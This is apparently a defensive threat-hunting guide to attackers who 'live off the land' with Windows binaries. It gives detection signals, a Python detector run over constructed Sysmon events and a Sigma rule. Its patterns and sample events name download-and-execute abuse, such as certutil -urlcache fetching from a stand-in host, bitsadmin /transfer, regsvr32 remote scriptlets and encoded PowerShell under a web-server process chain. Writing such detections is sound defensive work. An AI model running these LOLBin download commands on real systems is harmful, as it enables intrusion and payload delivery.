Attacker Living Off the Land with Native Binaries
The attacker relies on legitimate system binaries (PowerShell, certutil, bitsadmin, regsvr32, rundll32, mshta, wmic) for execution and lateral movement. File-reputation and signature-based detection fails because the binaries are legitimate; detection must shift to behavioral anomaly, parent-child process analysis, and command-line context.
Signals
- High-volume execution of native Windows binaries (PowerShell.exe, certutil.exe) in unusual contexts or locations
- Parent-child process chains like w3wp.exe -> cmd.exe -> powershell.exe or winword.exe -> wscript.exe
- Command lines with unusual flag combinations (certutil -urlcache, bitsadmin /transfer, regsvr32 /s /n /u /i:http)
- Binaries executing outside their typical use case (certutil downloading, rundll32 loading HTTP-hosted DLLs)
Pivot Actions
1. Deploy Sigma rule packs tuned for LOLBin abuse (LOLBAS project mappings) via Chainsaw/Hayabusa against EVTX or via SIEM
2. Build behavioral detection on parent-process anomalies rather than binary hashes -- PowerShell spawned by Excel is suspicious; PowerShell spawned by explorer.exe is usually legitimate
3. Enable PowerShell script-block logging (Event 4104), module logging (Event 4103), and AMSI integration to capture the actual scripts even when only LOLBins are invoked
4. Hunt for command-line patterns characteristic of specific LOLBin abuse: encoded PowerShell, certutil -urlcache -f, bitsadmin /transfer, mshta http://
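The following is an added example, not part of the original page, showing how pivot actions 2 and 4 look as detection logic run over process-creation records. It consumes constructed Sysmon Event ID 1 style events (the process IDs, paths and command lines are invented for illustration), rebuilds the parent chain through ParentProcessId links so that a three-hop chain such as w3wp.exe -> cmd.exe -> powershell.exe is visible even though each event only names its direct parent, matches the command-line shapes listed in the Signals section, and decodes -EncodedCommand payloads so an analyst sees the script rather than a base64 blob. The set names (SUSPICIOUS_PARENTS, LOLBINS, CMDLINE_PATTERNS) and the field names on ProcEvent are this example's own choices.

```python
"""Toy LOLBin detector over constructed Sysmon Event ID 1 (process creation) records.

Constructed example: every event, PID, path and command line below is invented
for illustration and does not come from a real host.
"""
import base64
import re
from dataclasses import dataclass

# Parents that should rarely spawn script hosts or download utilities (pivot action 2)
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "w3wp.exe"}
# Children whose appearance under such a parent is the anomaly
LOLBINS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe",
           "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe", "wmic.exe"}

# Command-line shapes from the Signals list (pivot action 4)
CMDLINE_PATTERNS = {
    "certutil-urlcache": re.compile(r"certutil(\.exe)?\s.*-urlcache", re.I),
    "bitsadmin-transfer": re.compile(r"bitsadmin(\.exe)?\s.*/transfer", re.I),
    "regsvr32-remote-scriptlet": re.compile(r"regsvr32(\.exe)?\s.*[/-]i:https?://", re.I),
    "mshta-http": re.compile(r"mshta(\.exe)?\s.*https?://", re.I),
    "powershell-encoded": re.compile(
        r"powershell(\.exe)?\s.*(?<!\S)-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I),
}
# Captures the base64 argument of -e / -ec / -enc / -EncodedCommand
ENCODED_ARG = re.compile(r"(?<!\S)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)


@dataclass
class ProcEvent:
    pid: int           # ProcessId
    ppid: int          # ParentProcessId
    image: str         # Image (full path)
    command_line: str  # CommandLine


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def ancestry(event: ProcEvent, by_pid: dict) -> list:
    """Follow ParentProcessId links to rebuild the chain root -> ... -> event."""
    chain = [basename(event.image)]
    seen = {event.pid}
    cur = by_pid.get(event.ppid)
    while cur is not None and cur.pid not in seen:  # guard against PID reuse loops
        chain.insert(0, basename(cur.image))
        seen.add(cur.pid)
        cur = by_pid.get(cur.ppid)
    return chain


def decode_encoded_command(cmdline: str):
    """-EncodedCommand carries base64 of UTF-16LE text; return the text or None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(event: ProcEvent, by_pid: dict) -> list:
    """Return (kind, detail) findings for one process-creation event."""
    findings = []
    chain = ancestry(event, by_pid)
    if chain[-1] in LOLBINS and any(a in SUSPICIOUS_PARENTS for a in chain[:-1]):
        findings.append(("chain", " -> ".join(chain)))
    for name, pattern in CMDLINE_PATTERNS.items():
        if pattern.search(event.command_line):
            findings.append(("cmdline", name))
    decoded = decode_encoded_command(event.command_line)
    if decoded is not None:
        findings.append(("decoded", decoded))
    return findings


def run(events: list) -> dict:
    """Analyze a batch of events; result is keyed by PID."""
    by_pid = {e.pid: e for e in events}
    return {e.pid: analyze(e, by_pid) for e in events}


# Constructed harmless payload so the decode path has something to show
SAMPLE_ENCODED = base64.b64encode("Write-Output 'constructed sample'".encode("utf-16-le")).decode()

SAMPLE_EVENTS = [  # constructed
    ProcEvent(4000, 3000, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(4100, 4000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -NoProfile -Command Get-Date"),            # benign: explorer parent
    ProcEvent(5000, 900, r"C:\Windows\System32\inetsrv\w3wp.exe", "w3wp.exe -ap DefaultAppPool"),
    ProcEvent(5100, 5000, r"C:\Windows\System32\cmd.exe", "cmd.exe /c whoami"),
    ProcEvent(5200, 5100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              f"powershell.exe -NoProfile -enc {SAMPLE_ENCODED}"),      # web shell style chain
    ProcEvent(6000, 4000, r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              r'WINWORD.EXE /n "C:\Users\Public\invoice.docx"'),
    ProcEvent(6100, 6000, r"C:\Windows\System32\certutil.exe",
              r"certutil.exe -urlcache -f http://example.invalid/x.txt C:\Users\Public\x.txt"),
]

if __name__ == "__main__":
    for pid, findings in run(SAMPLE_EVENTS).items():
        for kind, detail in findings:
            print(f"pid {pid}: {kind}: {detail}")
```

The chain check deliberately keys on the ancestor list rather than only the immediate parent: cmd.exe under w3wp.exe is flagged on its own, and the PowerShell grandchild is reported with the full w3wp.exe -> cmd.exe -> powershell.exe path. The explorer.exe -> powershell.exe event produces no finding, which is the distinction pivot action 2 draws.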
Alternate Evidence Sources
- LOLBAS project (lolbas-project.github.io) for comprehensive LOLBin-to-technique mappings
- Sigma community rules for LOLBin abuse detection
- Sysmon with full command-line logging and ParentCommandLine fields
- PowerShell operational logs (Microsoft-Windows-PowerShell/Operational) with script-block logging enabled
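As an added illustration of the Sigma-based approach in pivot action 1 (this rule is written for this page and is not one of the community rules), the certutil -urlcache signal expressed in Sigma's process_creation schema, deployable with Chainsaw, Hayabusa or a SIEM backend. The id is a placeholder UUID and must be replaced, and the Image/CommandLine field names are the standard Sigma process_creation fields.

```yaml
title: Certutil Download via URL Cache
id: 00000000-0000-0000-0000-000000000000   # placeholder, assign a real UUID before use
status: experimental
description: Detects certutil.exe invoked with -urlcache against an HTTP URL, a download pattern outside the binary's normal certificate-management use.
references:
  - https://lolbas-project.github.io/
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith: '\certutil.exe'
    CommandLine|contains|all:
      - 'urlcache'
      - 'http'
  condition: selection
fields:
  - ParentImage
  - CommandLine
falsepositives:
  - Administrators fetching certificates or CRLs with certutil
level: high
```

Keeping ParentImage in the fields list means the alert surfaces the parent process alongside the command line, so the parent-child context from pivot action 2 is available at triage without a second query.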